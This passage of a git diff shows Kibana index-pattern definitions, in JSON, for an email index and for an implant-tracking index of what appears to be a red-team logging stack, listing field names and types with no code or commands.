:\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171860673, 15], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson deleted file mode 100644 index a1f1a36d..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":